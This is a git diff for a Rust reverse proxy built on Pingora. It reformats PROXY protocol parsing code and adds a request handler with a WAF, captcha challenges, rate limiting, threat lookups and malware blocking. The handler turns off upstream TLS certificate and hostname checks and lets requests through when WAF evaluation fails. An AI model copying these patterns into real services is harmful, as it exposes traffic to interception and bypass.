} - proxy_protocol::version1::ProxyAddresses::Ipv6 { source, destination } => { - Some(ProxyInfo { - source_addr: SocketAddr::V6(source), - dest_addr: SocketAddr::V6(destination), - version: ProxyVersion::V1, - }) - } - proxy_protocol::version1::ProxyAddresses::Unknown => None, - } - } - ProxyHeader::Version2 { addresses, .. } => { - match addresses { - proxy_protocol::version2::ProxyAddresses::Ipv4 { source, destination } => { - Some(ProxyInfo { - source_addr: SocketAddr::V4(source), - dest_addr: SocketAddr::V4(destination), - version: ProxyVersion::V2, - }) - } - proxy_protocol::version2::ProxyAddresses::Ipv6 { source, destination } => { - Some(ProxyInfo { - source_addr: SocketAddr::V6(source), - dest_addr: SocketAddr::V6(destination), - version: ProxyVersion::V2, - }) - } - proxy_protocol::version2::ProxyAddresses::Unspec => None, - proxy_protocol::version2::ProxyAddresses::Unix { .. } => None, - } - } + ProxyHeader::Version1 { addresses } => match addresses { + proxy_protocol::version1::ProxyAddresses::Ipv4 { + source, + destination, + } => Some(ProxyInfo { + source_addr: SocketAddr::V4(source), + dest_addr: SocketAddr::V4(destination), + version: ProxyVersion::V1, + }), + proxy_protocol::version1::ProxyAddresses::Ipv6 { + source, + destination, + } => Some(ProxyInfo { + source_addr: SocketAddr::V6(source), + dest_addr: SocketAddr::V6(destination), + version: ProxyVersion::V1, + }), + proxy_protocol::version1::ProxyAddresses::Unknown => None, + }, + ProxyHeader::Version2 { addresses, .. } => match addresses { + proxy_protocol::version2::ProxyAddresses::Ipv4 { + source, + destination, + } => Some(ProxyInfo { + source_addr: SocketAddr::V4(source), + dest_addr: SocketAddr::V4(destination), + version: ProxyVersion::V2, + }), + proxy_protocol::version2::ProxyAddresses::Ipv6 { + source, + destination, + } => Some(ProxyInfo { + source_addr: SocketAddr::V6(source), + dest_addr: SocketAddr::V6(destination), + version: ProxyVersion::V2, + }), + proxy_protocol::version2::ProxyAddresses::Unspec => None, + proxy_protocol::version2::ProxyAddresses::Unix { .. } => None, + }, _ => None, } } @@ -191,7 +196,11 @@ fn create_reader_with_prefix( ) -> BufReader> { let inner_stream = inner.into_inner(); let chained = ChainedReader { - prefix: if prefix.is_empty() { None } else { Some(prefix) }, + prefix: if prefix.is_empty() { + None + } else { + Some(prefix) + }, prefix_pos: 0, inner: inner_stream, }; @@ -257,11 +266,7 @@ impl ProxyProtocolStream where T: AsyncRead + AsyncWrite + Unpin, { - pub async fn new( - stream: T, - proxy_protocol_enabled: bool, - timeout_ms: u64, - ) -> Result { + pub async fn new(stream: T, proxy_protocol_enabled: bool, timeout_ms: u64) -> Result { if proxy_protocol_enabled { let (proxy_info, reader) = parse_proxy_protocol_buffered(stream, timeout_ms).await?; @@ -319,9 +324,7 @@ impl ProxyProtocolStream { match self { Self::Plain { inner, .. } => inner.peer_addr(), Self::Buffered { inner, .. } => inner.get_ref().peer_addr(), - Self::ChainedBuffered { inner, .. } => { - inner.get_ref().inner.peer_addr() - } + Self::ChainedBuffered { inner, .. } => inner.get_ref().inner.peer_addr(), } } @@ -330,9 +333,7 @@ impl ProxyProtocolStream { match self { Self::Plain { inner, .. } => inner.local_addr(), Self::Buffered { inner, .. } => inner.get_ref().local_addr(), - Self::ChainedBuffered { inner, .. } => { - inner.get_ref().inner.local_addr() - } + Self::ChainedBuffered { inner, .. } => inner.get_ref().inner.local_addr(), } } @@ -342,9 +343,7 @@ impl ProxyProtocolStream { match self { Self::Plain { inner, .. } => inner.shutdown().await, Self::Buffered { inner, .. } => inner.get_mut().shutdown().await, - Self::ChainedBuffered { inner, .. } => { - inner.get_mut().inner.shutdown().await - } + Self::ChainedBuffered { inner, .. } => inner.get_mut().inner.shutdown().await, } } @@ -354,9 +353,7 @@ impl ProxyProtocolStream { match self { Self::Plain { inner, .. } => inner.write_all(buf).await, Self::Buffered { inner, .. } => inner.get_mut().write_all(buf).await, - Self::ChainedBuffered { inner, .. } => { - inner.get_mut().inner.write_all(buf).await - } + Self::ChainedBuffered { inner, .. } => inner.get_mut().inner.write_all(buf).await, } } } @@ -371,15 +368,9 @@ where buf: &mut tokio::io::ReadBuf<'_>, ) -> std::task::Poll> { match &mut *self { - Self::Plain { inner, .. } => { - std::pin::Pin::new(inner).poll_read(cx, buf) - } - Self::Buffered { inner, .. } => { - std::pin::Pin::new(inner).poll_read(cx, buf) - } - Self::ChainedBuffered { inner, .. } => { - std::pin::Pin::new(inner).poll_read(cx, buf) - } + Self::Plain { inner, .. } => std::pin::Pin::new(inner).poll_read(cx, buf), + Self::Buffered { inner, .. } => std::pin::Pin::new(inner).poll_read(cx, buf), + Self::ChainedBuffered { inner, .. } => std::pin::Pin::new(inner).poll_read(cx, buf), } } } @@ -394,12 +385,8 @@ where buf: &[u8], ) -> std::task::Poll> { match &mut *self { - Self::Plain { inner, .. } => { - std::pin::Pin::new(inner).poll_write(cx, buf) - } - Self::Buffered { inner, .. } => { - std::pin::Pin::new(inner.get_mut()).poll_write(cx, buf) - } + Self::Plain { inner, .. } => std::pin::Pin::new(inner).poll_write(cx, buf), + Self::Buffered { inner, .. } => std::pin::Pin::new(inner.get_mut()).poll_write(cx, buf), Self::ChainedBuffered { inner, .. } => { std::pin::Pin::new(&mut inner.get_mut().inner).poll_write(cx, buf) } @@ -411,12 +398,8 @@ where cx: &mut std::task::Context<'_>, ) -> std::task::Poll> { match &mut *self { - Self::Plain { inner, .. } => { - std::pin::Pin::new(inner).poll_flush(cx) - } - Self::Buffered { inner, .. } => { - std::pin::Pin::new(inner.get_mut()).poll_flush(cx) - } + Self::Plain { inner, .. } => std::pin::Pin::new(inner).poll_flush(cx), + Self::Buffered { inner, .. } => std::pin::Pin::new(inner.get_mut()).poll_flush(cx), Self::ChainedBuffered { inner, .. } => { std::pin::Pin::new(&mut inner.get_mut().inner).poll_flush(cx) } @@ -428,12 +411,8 @@ where cx: &mut std::task::Context<'_>, ) -> std::task::Poll> { match &mut *self { - Self::Plain { inner, .. } => { - std::pin::Pin::new(inner).poll_shutdown(cx) - } - Self::Buffered { inner, .. } => { - std::pin::Pin::new(inner.get_mut()).poll_shutdown(cx) - } + Self::Plain { inner, .. } => std::pin::Pin::new(inner).poll_shutdown(cx), + Self::Buffered { inner, .. } => std::pin::Pin::new(inner.get_mut()).poll_shutdown(cx), Self::ChainedBuffered { inner, .. } => { std::pin::Pin::new(&mut inner.get_mut().inner).poll_shutdown(cx) } @@ -444,8 +423,8 @@ where #[cfg(test)] mod tests { use super::*; - use std::io::Cursor; use proxy_protocol::encode; + use std::io::Cursor; #[tokio::test] async fn test_parse_proxy_v1_ipv4() { @@ -457,9 +436,15 @@ mod tests { assert!(result.is_some()); let info = result.unwrap(); - assert_eq!(info.source_addr.ip(), "192.168.1.100".parse::().unwrap()); + assert_eq!( + info.source_addr.ip(), + "192.168.1.100".parse::().unwrap() + ); assert_eq!(info.source_addr.port(), 12345); - assert_eq!(info.dest_addr.ip(), "192.168.1.200".parse::().unwrap()); + assert_eq!( + info.dest_addr.ip(), + "192.168.1.200".parse::().unwrap() + ); assert_eq!(info.dest_addr.port(), 80); matches!(info.version, ProxyVersion::V1); } @@ -474,9 +459,15 @@ mod tests { assert!(result.is_some()); let info = result.unwrap(); - assert_eq!(info.source_addr.ip(), "2001:db8::1".parse::().unwrap()); + assert_eq!( + info.source_addr.ip(), + "2001:db8::1".parse::().unwrap() + ); assert_eq!(info.source_addr.port(), 12345); - assert_eq!(info.dest_addr.ip(), "2001:db8::2".parse::().unwrap()); + assert_eq!( + info.dest_addr.ip(), + "2001:db8::2".parse::().unwrap() + ); assert_eq!(info.dest_addr.port(), 80); matches!(info.version, ProxyVersion::V1); } @@ -488,8 +479,14 @@ mod tests { command: proxy_protocol::version2::ProxyCommand::Proxy, transport_protocol: proxy_protocol::version2::ProxyTransportProtocol::Stream, addresses: proxy_protocol::version2::ProxyAddresses::Ipv4 { - source: std::net::SocketAddrV4::new(std::net::Ipv4Addr::new(192, 168, 1, 100), 12345), - destination: std::net::SocketAddrV4::new(std::net::Ipv4Addr::new(192, 168, 1, 200), 80), + source: std::net::SocketAddrV4::new( + std::net::Ipv4Addr::new(192, 168, 1, 100), + 12345, + ), + destination: std::net::SocketAddrV4::new( + std::net::Ipv4Addr::new(192, 168, 1, 200), + 80, + ), }, extensions: vec![], }; @@ -501,9 +498,15 @@ mod tests { assert!(result.is_some()); let info = result.unwrap(); - assert_eq!(info.source_addr.ip(), "192.168.1.100".parse::().unwrap()); + assert_eq!( + info.source_addr.ip(), + "192.168.1.100".parse::().unwrap() + ); assert_eq!(info.source_addr.port(), 12345); - assert_eq!(info.dest_addr.ip(), "192.168.1.200".parse::().unwrap()); + assert_eq!( + info.dest_addr.ip(), + "192.168.1.200".parse::().unwrap() + ); assert_eq!(info.dest_addr.port(), 80); matches!(info.version, ProxyVersion::V2); } @@ -517,11 +520,15 @@ mod tests { addresses: proxy_protocol::version2::ProxyAddresses::Ipv6 { source: std::net::SocketAddrV6::new( std::net::Ipv6Addr::new(0x2001, 0x0db8, 0, 0, 0, 0, 0, 1), - 12345, 0, 0 + 12345, + 0, + 0, ), destination: std::net::SocketAddrV6::new( std::net::Ipv6Addr::new(0x2001, 0x0db8, 0, 0, 0, 0, 0, 2), - 80, 0, 0 + 80, + 0, + 0, ), }, extensions: vec![], @@ -534,9 +541,15 @@ mod tests { assert!(result.is_some()); let info = result.unwrap(); - assert_eq!(info.source_addr.ip(), "2001:db8::1".parse::().unwrap()); + assert_eq!( + info.source_addr.ip(), + "2001:db8::1".parse::().unwrap() + ); assert_eq!(info.source_addr.port(), 12345); - assert_eq!(info.dest_addr.ip(), "2001:db8::2".parse::().unwrap()); + assert_eq!( + info.dest_addr.ip(), + "2001:db8::2".parse::().unwrap() + ); assert_eq!(info.dest_addr.port(), 80); matches!(info.version, ProxyVersion::V2); } @@ -567,7 +580,10 @@ mod tests { let mut wrapper = ProxyProtocolStream::new(stream, true, 1000).await.unwrap(); assert!(wrapper.has_proxy_info()); - assert_eq!(wrapper.real_client_addr().unwrap().ip(), "192.168.1.100".parse::().unwrap()); + assert_eq!( + wrapper.real_client_addr().unwrap().ip(), + "192.168.1.100".parse::().unwrap() + ); assert_eq!(wrapper.real_client_addr().unwrap().port(), 12345); // Verify HTTP request is still readable @@ -588,7 +604,10 @@ mod tests { assert!(info.is_some()); let proxy_info = info.unwrap(); - assert_eq!(proxy_info.source_addr.ip(), "10.0.0.1".parse::().unwrap()); + assert_eq!( + proxy_info.source_addr.ip(), + "10.0.0.1".parse::().unwrap() + ); // Verify HTTP data is preserved let mut buf = Vec::new(); diff --git a/src/proxy/proxyhttp.rs b/src/proxy/proxyhttp.rs new file mode 100644 index 0000000..9265855 --- /dev/null +++ b/src/proxy/proxyhttp.rs @@ -0,0 +1,1463 @@ +use crate::proxy::gethosts::GetHost; +use crate::security::waf::actions::captcha::{ + apply_captcha_challenge_with_token, generate_captcha_token, validate_captcha_token, +}; +use crate::security::waf::wirefilter::{WafAction, evaluate_waf_for_pingora_request}; +use crate::utils::structs::{ + AppConfig, Extraparams, Headers, InnerMap, RequestHeaders, ResponseHeaders, UpstreamsDashMap, + UpstreamsIdMap, +}; +use arc_swap::ArcSwap; +use async_trait::async_trait; +use axum::body::Bytes; +use dashmap::DashMap; +use hyper::http; +use log::{debug, error, info, warn}; +use once_cell::sync::Lazy; +use pingora_core::ErrorSource::{Internal as ErrorSourceInternal, Upstream}; +use pingora_core::listeners::ALPN; +use pingora_core::prelude::HttpPeer; +use pingora_core::prelude::*; +use pingora_core::{ + Error, + ErrorType::{self, HTTPStatus}, + ImmutStr, RetryType, +}; +use pingora_http::{RequestHeader, ResponseHeader, StatusCode}; +use pingora_limits::rate::Rate; +use pingora_proxy::{FailToProxy, ProxyHttp, Session}; +use serde_json; +use std::sync::Arc; +use std::sync::atomic::AtomicUsize; +use std::time::Duration; +use tokio::time::Instant; + +static RATE_LIMITER: Lazy = Lazy::new(|| Rate::new(Duration::from_secs(1))); + +#[derive(Clone)] +pub struct LB { + pub ump_upst: Arc, + pub ump_full: Arc, + pub ump_byid: Arc, + pub internal_paths: Arc, AtomicUsize)>>, + pub headers: Arc, // Legacy: kept for backward compatibility + pub request_headers: Arc, // Headers to add to upstream requests (per hostname/path) + pub response_headers: Arc, // Headers to add to responses (per hostname/path) + pub global_request_headers: Arc>>, // Headers to add to upstream requests + pub global_response_headers: Arc>>, // Headers to add to responses + pub config: Arc, + pub extraparams: Arc>, + pub tcp_fingerprint_collector: + Option>, + pub certificates: Option>>>>, +} + +pub struct Context { + backend_id: String, + start_time: Instant, + upstream_start_time: Option, + hostname: Option, + upstream_peer: Option, + extraparams: arc_swap::Guard>, + tls_fingerprint: Option>, + request_body: Vec, + malware_detected: bool, + malware_response_sent: bool, + waf_result: Option, + threat_data: Option, + upstream_time: Option, + disable_access_log: bool, + keepalive_override: Option>, + error_details: Option, +} + +#[async_trait] +impl ProxyHttp for LB { + type CTX = Context; + fn new_ctx(&self) -> Self::CTX { + Context { + backend_id: String::new(), + start_time: Instant::now(), + upstream_start_time: None, + hostname: None, + upstream_peer: None, + extraparams: self.extraparams.load(), + tls_fingerprint: None, + request_body: Vec::new(), + malware_detected: false, + malware_response_sent: false, + waf_result: None, + threat_data: None, + upstream_time: None, + disable_access_log: false, + keepalive_override: None, + error_details: None, + } + } + async fn request_filter(&self, session: &mut Session, _ctx: &mut Self::CTX) -> Result { + // Enable body buffering for content scanning + session.enable_retry_buffering(); + + let req_header = session.req_header(); + let conn_header = req_header + .headers + .get("connection") + .and_then(|h| h.to_str().ok()) + .map(|v| v.to_ascii_lowercase()); + + let is_http10 = req_header.version == http::Version::HTTP_10; + let should_close = conn_header + .as_deref() + .map(|v| v.contains("close")) + .unwrap_or(false); + + let keepalive_override = if should_close { + Some(None) + } else if is_http10 { + let keepalive_requested = conn_header + .as_deref() + .map(|v| v.contains("keep-alive")) + .unwrap_or(false); + if keepalive_requested { + Some(Some(300)) + } else { + Some(None) + } + } else { + None + }; + + // HTTP/1.0 without Content-Length/Transfer-Encoding should be treated as empty for + // methods that do not send a body, otherwise the server will wait for EOF. + if is_http10 { + let has_content_length = req_header.headers.get("content-length").is_some(); + let has_transfer_encoding = req_header.headers.get("transfer-encoding").is_some(); + let method = req_header.method.as_str(); + let method_without_body = + matches!(method, "GET" | "HEAD" | "DELETE" | "OPTIONS" | "TRACE"); + + if method_without_body && !has_content_length && !has_transfer_encoding { + let _ = session + .req_header_mut() + .insert_header("content-length", "0"); + } + } + + _ctx.keepalive_override = keepalive_override; + if let Some(keepalive) = _ctx.keepalive_override { + session.set_keepalive(keepalive); + if keepalive.is_none() { + session + .as_downstream_mut() + .set_close_on_response_before_downstream_finish(true); + } + } + + let ep = _ctx.extraparams.clone(); + + // Userland access rules check (fallback when eBPF/XDP is not available) + // Check if IP is blocked by access rules + if let Some(peer_addr) = session.client_addr().and_then(|addr| addr.as_inet()) { + let client_ip: std::net::IpAddr = peer_addr.ip().into(); + + // Check if IP is blocked + if crate::security::access_rules::is_ip_blocked_by_access_rules(client_ip) { + log::info!( + "Userland access rules: Blocked request from IP: {} (matched block rule)", + client_ip + ); + let mut header = ResponseHeader::build(403, None).unwrap(); + header.insert_header("X-Block-Reason", "access_rules").ok(); + session.set_keepalive(None); + session + .write_response_header(Box::new(header), true) + .await?; + return Ok(true); + } + } + + // Try to get TLS fingerprint if available + // Use fallback lookup to handle PROXY protocol address mismatches + if _ctx.tls_fingerprint.is_none() { + if let Some(peer_addr) = session.client_addr().and_then(|addr| addr.as_inet()) { + let std_addr = std::net::SocketAddr::new(peer_addr.ip().into(), peer_addr.port()); + if let Some(fingerprint) = + crate::utils::tls_client_hello::get_fingerprint_with_fallback(&std_addr) + { + _ctx.tls_fingerprint = Some(fingerprint.clone()); + debug!( + "TLS Fingerprint retrieved for session - Peer: {}, JA4: {}, SNI: {:?}, ALPN: {:?}", + std_addr, fingerprint.ja4, fingerprint.sni, fingerprint.alpn + ); + } else { + debug!( + "No TLS fingerprint found in storage for peer: {} (PROXY protocol may cause this)", + std_addr + ); + } + } + } + + // Get threat intelligence data BEFORE WAF evaluation + // This ensures threat intelligence is available in access logs even when WAF blocks/challenges early + if let Some(peer_addr) = session.client_addr().and_then(|addr| addr.as_inet()) { + if _ctx.threat_data.is_none() { + match crate::security::waf::threat::get_threat_intel(&peer_addr.ip().to_string()) + .await + { + Ok(Some(threat_response)) => { + _ctx.threat_data = Some(threat_response); + debug!("Threat intelligence retrieved for IP: {}", peer_addr.ip()); + } + Ok(None) => { + debug!("No threat intelligence data for IP: {}", peer_addr.ip()); + } + Err(e) => { + debug!("Threat intelligence error for IP {}: {}", peer_addr.ip(), e); + } + } + } + } + + // Evaluate WAF rules + if let Some(peer_addr) = session.client_addr().and_then(|addr| addr.as_inet()) { + let socket_addr = std::net::SocketAddr::new(peer_addr.ip(), peer_addr.port()); + match evaluate_waf_for_pingora_request(session.req_header(), b"", socket_addr).await { + Ok(Some(waf_result)) => { + debug!( + "WAF rule matched: rule={}, id={}, action={:?}", + waf_result.rule_name, waf_result.rule_id, waf_result.action + ); + + // Store threat response from WAF result if available (WAF already fetched it) + if let Some(threat_resp) = waf_result.threat_response.clone() { + _ctx.threat_data = Some(threat_resp); + debug!( + "Threat intelligence retrieved from WAF evaluation for IP: {}", + peer_addr.ip() + ); + } + + // Store WAF result in context for access logging + _ctx.waf_result = Some(waf_result.clone()); + + match waf_result.action { + WafAction::Block => { + info!( + "WAF blocked request: rule={}, id={}, uri={}", + waf_result.rule_name, + waf_result.rule_id, + session.req_header().uri + ); + let mut header = ResponseHeader::build(403, None).unwrap(); + header + .insert_header("X-WAF-Rule", waf_result.rule_name) + .ok(); + header + .insert_header("X-WAF-Rule-ID", waf_result.rule_id) + .ok(); + session.set_keepalive(None); + session + .write_response_header(Box::new(header), true) + .await?; + return Ok(true); + } + WafAction::Challenge => { + info!( + "WAF challenge required: rule={}, id={}, uri={}", + waf_result.rule_name, + waf_result.rule_id, + session.req_header().uri + ); + + // Check for captcha token in cookies or headers + let mut captcha_token: Option = None; + + // Check cookies for captcha_token + if let Some(cookies) = session.req_header().headers.get("cookie") { + if let Ok(cookie_str) = cookies.to_str() { + for cookie in cookie_str.split(';') { + let trimmed = cookie.trim(); + if let Some(value) = trimmed.strip_prefix("captcha_token=") + { + captcha_token = Some(value.to_string()); + break; + } + } + } + } + + // Check X-Captcha-Token header if not found in cookies + if captcha_token.is_none() { + if let Some(token_header) = + session.req_header().headers.get("x-captcha-token") + { + if let Ok(token_str) = token_header.to_str() { + captcha_token = Some(token_str.to_string()); + } + } + } + + // Validate token if present + let token_valid = if let Some(token) = &captcha_token { + let user_agent = session + .req_header() + .headers + .get("user-agent") + .and_then(|h| h.to_str().ok()) + .unwrap_or("") + .to_string(); + + match validate_captcha_token( + token, + &peer_addr.ip().to_string(), + &user_agent, + ) + .await + { + Ok(valid) => { + if valid { + debug!("Captcha token validated successfully"); + } else { + debug!("Captcha token validation failed"); + } + valid + } + Err(e) => { + error!("Captcha token validation error: {}", e); + false + } + } + } else { + false + }; + + if !token_valid { + // Generate a new token (don't reuse invalid token) + let jwt_token = { + let user_agent = session + .req_header() + .headers + .get("user-agent") + .and_then(|h| h.to_str().ok()) + .unwrap_or("") + .to_string(); + + match generate_captcha_token( + peer_addr.ip().to_string(), + user_agent, + None, // JA4 fingerprint not available here + ) + .await + { + Ok(token) => token.token, + Err(e) => { + error!("Failed to generate captcha token: {}", e); + // Fallback to challenge without token + match apply_captcha_challenge_with_token("") { + Ok(html) => { + let mut header = + ResponseHeader::build(403, None).unwrap(); + header + .insert_header( + "Content-Type", + "text/html; charset=utf-8", + ) + .ok(); + session.set_keepalive(None); + session + .write_response_header( + Box::new(header), + false, + ) + .await?; + session + .write_response_body( + Some(Bytes::from(html)), + true, + ) + .await?; + return Ok(true); + } + Err(e) => { + error!( + "Failed to apply captcha challenge: {}", + e + ); + // Block the request if captcha fails + let mut header = + ResponseHeader::build(403, None).unwrap(); + header + .insert_header( + "X-WAF-Rule", + waf_result.rule_name, + ) + .ok(); + header + .insert_header( + "X-WAF-Rule-ID", + waf_result.rule_id, + ) + .ok(); + session.set_keepalive(None); + session + .write_response_header( + Box::new(header), + true, + ) + .await?; + return Ok(true); + } + } + } + } + }; + + // Return captcha challenge page + match apply_captcha_challenge_with_token(&jwt_token) { + Ok(html) => { + let mut header = ResponseHeader::build(403, None).unwrap(); + header + .insert_header( + "Content-Type", + "text/html; charset=utf-8", + ) + .ok(); + header.insert_header("Set-Cookie", format!("captcha_token={}; Path=/; HttpOnly; SameSite=Lax", jwt_token)).ok(); + header + .insert_header("X-WAF-Rule", waf_result.rule_name) + .ok(); + header + .insert_header("X-WAF-Rule-ID", waf_result.rule_id) + .ok(); + session.set_keepalive(None); + session + .write_response_header(Box::new(header), false) + .await?; + session + .write_response_body(Some(Bytes::from(html)), true) + .await?; + return Ok(true); + } + Err(e) => { + error!("Failed to apply captcha challenge: {}", e); + // Block the request if captcha fails + let mut header = ResponseHeader::build(403, None).unwrap(); + header + .insert_header("X-WAF-Rule", waf_result.rule_name) + .ok(); + header + .insert_header("X-WAF-Rule-ID", waf_result.rule_id) + .ok(); + session.set_keepalive(None); + session + .write_response_header(Box::new(header), true) + .await?; + return Ok(true); + } + } + } else { + // Token is valid, allow request to continue + debug!("Captcha token validated, allowing request"); + } + } + WafAction::RateLimit => { + use crate::security::waf::actions::rate_limit; + + if let Some(rate_limit_config) = &waf_result.rate_limit_config { + let client_ip = peer_addr.ip().to_string(); + let result = rate_limit::check_rate_limit( + &waf_result.rule_id, + &client_ip, + rate_limit_config, + ); + + if result.exceeded { + info!( + "Rate limit exceeded: rule={}, id={}, ip={}, requests={}/{}", + waf_result.rule_name, + waf_result.rule_id, + client_ip, + result.current_requests, + result.limit + ); + + let body = rate_limit::generate_rate_limit_json( + &waf_result.rule_name, + &waf_result.rule_id, + &result, + ); + + let mut header = ResponseHeader::build(429, None).unwrap(); + for (name, value) in + rate_limit::generate_rate_limit_headers(&result) + { + header.insert_header(name, value).ok(); + } + header + .insert_header("X-WAF-Rule", &waf_result.rule_name) + .ok(); + header + .insert_header("X-WAF-Rule-ID", &waf_result.rule_id) + .ok(); + header + .insert_header("Content-Type", "application/json") + .ok(); + + session.set_keepalive(None); + session + .write_response_header(Box::new(header), false) + .await?; + session + .write_response_body(Some(Bytes::from(body)), true) + .await?; + return Ok(true); + } else { + debug!( + "Rate limit check passed: rule={}, id={}, ip={}, requests={}/{}", + waf_result.rule_name, + waf_result.rule_id, + client_ip, + result.current_requests, + result.limit + ); + } + } else { + warn!( + "Rate limit action triggered but no config found for rule {}", + waf_result.rule_id + ); + } + } + WafAction::Allow => { + debug!( + "WAF allowed request: rule={}, id={}", + waf_result.rule_name, waf_result.rule_id + ); + // Allow the request to continue + } + } + } + Ok(None) => { + // No WAF rules matched, allow request to continue + debug!("WAF: No rules matched for uri={}", session.req_header().uri); + } + Err(e) => { + error!("WAF evaluation error: {}", e); + // On error, allow request to continue (fail open) + } + } + } else { + debug!("WAF: No peer address available for request"); + } + + let hostname = return_header_host(&session); + _ctx.hostname = hostname; + + let mut backend_id = None; + + if ep.sticky_sessions { + if let Some(cookies) = session.req_header().headers.get("cookie") { + if let Ok(cookie_str) = cookies.to_str() { + for cookie in cookie_str.split(';') { + let trimmed = cookie.trim(); + if let Some(value) = trimmed.strip_prefix("backend_id=") { + backend_id = Some(value); + break; + } + } + } + } + } + + match _ctx.hostname.as_ref() { + None => return Ok(false), + Some(host) => { + // let optioninnermap = self.get_host(host.as_str(), host.as_str(), backend_id); + let optioninnermap = + self.get_host(host.as_str(), session.req_header().uri.path(), backend_id); + match optioninnermap { + None => return Ok(false), + Some(ref innermap) => { + // Check for HTTPS redirect before rate limiting + if ep.https_proxy_enabled.unwrap_or(false) || innermap.https_proxy_enabled { + if let Some(stream) = session.stream() { + if stream.get_ssl().is_none() { + // HTTP request - redirect to HTTPS + let uri = session + .req_header() + .uri + .path_and_query() + .map_or("/", |pq| pq.as_str()); + let port = self.config.proxy_port_tls.unwrap_or(403); + let redirect_url = format!("https://{}:{}{}", host, port, uri); + let mut redirect_response = + ResponseHeader::build(StatusCode::MOVED_PERMANENTLY, None)?; + redirect_response.insert_header("Location", redirect_url)?; + redirect_response.insert_header("Content-Length", "0")?; + session.set_keepalive(None); + session + .write_response_header(Box::new(redirect_response), false) + .await?; + return Ok(true); + } + } + } + if let Some(rate) = innermap.rate_limit.or(ep.rate_limit) { + // let rate_key = session.client_addr().and_then(|addr| addr.as_inet()).map(|inet| inet.ip().to_string()).unwrap_or_else(|| host.to_string()); + let rate_key = session + .client_addr() + .and_then(|addr| addr.as_inet()) + .map(|inet| inet.ip()); + let curr_window_requests = RATE_LIMITER.observe(&rate_key, 1); + if curr_window_requests > rate { + let mut header = ResponseHeader::build(429, None).unwrap(); + header + .insert_header("X-Rate-Limit-Limit", rate.to_string()) + .unwrap(); + header.insert_header("X-Rate-Limit-Remaining", "0").unwrap(); + header.insert_header("X-Rate-Limit-Reset", "1").unwrap(); + session.set_keepalive(None); + session + .write_response_header(Box::new(header), true) + .await?; + debug!("Rate limited: {:?}, {}", rate_key, rate); + return Ok(true); + } + } + } + } + _ctx.upstream_peer = optioninnermap.clone(); + // Set disable_access_log flag from upstream config + if let Some(ref innermap) = optioninnermap { + _ctx.disable_access_log = innermap.disable_access_log; + } + } + } + Ok(false) + } + async fn upstream_peer( + &self, + session: &mut Session, + ctx: &mut Self::CTX, + ) -> Result> { + // Check if malware was detected, send JSON response and prevent forwarding + if ctx.malware_detected && !ctx.malware_response_sent { + // Check if response has already been written + if session.response_written().is_some() { + warn!("Response already written, cannot block malware request in upstream_peer"); + ctx.malware_response_sent = true; + return Err(Box::new(Error { + etype: HTTPStatus(403), + esource: Upstream, + retry: RetryType::Decided(false), + cause: None, + context: Option::from(ImmutStr::Static("Malware detected")), + })); + } + + info!("Blocking request due to malware detection"); + + // Build JSON response + let json_response = serde_json::json!({ + "success": false, + "error": "Request blocked", + "reason": "malware_detected", + "message": "Malware detected in request" + }); + let json_body = Bytes::from(json_response.to_string()); + + // Build response header + let mut header = ResponseHeader::build(403, None).unwrap(); + header + .insert_header("Content-Type", "application/json") + .ok(); + header + .insert_header("X-Content-Scan-Result", "malware_detected") + .ok(); + + session.set_keepalive(None); + + // Try to write response, handle error if response already sent + match session.write_response_header(Box::new(header), false).await { + Ok(_) => match session.write_response_body(Some(json_body), true).await { + Ok(_) => { + ctx.malware_response_sent = true; + } + Err(e) => { + warn!( + "Failed to write response body for malware block in upstream_peer: {}", + e + ); + ctx.malware_response_sent = true; + } + }, + Err(e) => { + warn!( + "Failed to write response header for malware block in upstream_peer: {}", + e + ); + ctx.malware_response_sent = true; + } + } + + return Err(Box::new(Error { + etype: HTTPStatus(403), + esource: Upstream, + retry: RetryType::Decided(false), + cause: None, + context: Option::from(ImmutStr::Static("Malware detected")), + })); + } + + // let host_name = return_header_host(&session); + match ctx.hostname.as_ref() { + Some(_hostname) => { + match ctx.upstream_peer.as_ref() { + // Some((address, port, ssl, is_h2, https_proxy_enabled)) => { + Some(innermap) => { + let mut peer = Box::new(HttpPeer::new( + (innermap.address.clone(), innermap.port.clone()), + innermap.ssl_enabled, + String::new(), + )); + // if session.is_http2() { + if innermap.http2_enabled { + peer.options.alpn = ALPN::H2; + } + if innermap.ssl_enabled { + // Use upstream server address for SNI, not the incoming hostname + // This ensures the SNI matches what the upstream server expects + peer.sni = innermap.address.clone(); + peer.options.verify_cert = false; + peer.options.verify_hostname = false; + } + + // Apply timeout configurations from upstream config + // Defaults: connection_timeout: 30s, read_timeout: 120s, write_timeout: 30s, idle_timeout: 60s + peer.options.connection_timeout = innermap + .connection_timeout + .map(|s| Duration::from_secs(s)) + .or(Some(Duration::from_secs(30))); + peer.options.read_timeout = innermap + .read_timeout + .map(|s| Duration::from_secs(s)) + .or(Some(Duration::from_secs(120))); + peer.options.write_timeout = innermap + .write_timeout + .map(|s| Duration::from_secs(s)) + .or(Some(Duration::from_secs(30))); + peer.options.idle_timeout = innermap + .idle_timeout + .map(|s| Duration::from_secs(s)) + .or(Some(Duration::from_secs(60))); + + ctx.backend_id = format!( + "{}:{}:{}", + innermap.address.clone(), + innermap.port.clone(), + innermap.ssl_enabled + ); + Ok(peer) + } + None => { + if let Err(e) = session + .respond_error_with_body(502, Bytes::from("502 Bad Gateway\n")) + .await + { + error!("Failed to send error response: {:?}", e); + } + Err(Box::new(Error { + etype: HTTPStatus(502), + esource: Upstream, + retry: RetryType::Decided(false), + cause: None, + context: Option::from(ImmutStr::Static("Upstream not found")), + })) + } + } + } + None => { + // session.respond_error_with_body(502, Bytes::from("502 Bad Gateway\n")).await.expect("Failed to send error"); + if let Err(e) = session + .respond_error_with_body(502, Bytes::from("502 Bad Gateway\n")) + .await + { + error!("Failed to send error response: {:?}", e); + } + Err(Box::new(Error { + etype: HTTPStatus(502), + esource: Upstream, + retry: RetryType::Decided(false), + cause: None, + context: None, + })) + } + } + } + + async fn upstream_request_filter( + &self, + _session: &mut Session, + upstream_request: &mut RequestHeader, + ctx: &mut Self::CTX, + ) -> Result<()> { + // Track when we start upstream request + ctx.upstream_start_time = Some(Instant::now()); + + // Check if config has a Host header before setting default + let mut config_has_host = false; + if let Some(hostname) = ctx.hostname.as_ref() { + let path = _session.req_header().uri.path(); + if let Some(configured_headers) = self.get_request_headers(hostname, path) { + for (key, _) in configured_headers.iter() { + if key.eq_ignore_ascii_case("Host") { + config_has_host = true; + break; + } + } + } + } + + // Only set default Host if config doesn't override it + if !config_has_host { + if let Some(hostname) = ctx.hostname.as_ref() { + upstream_request.insert_header("Host", hostname)?; + } + } + + if let Some(peer) = 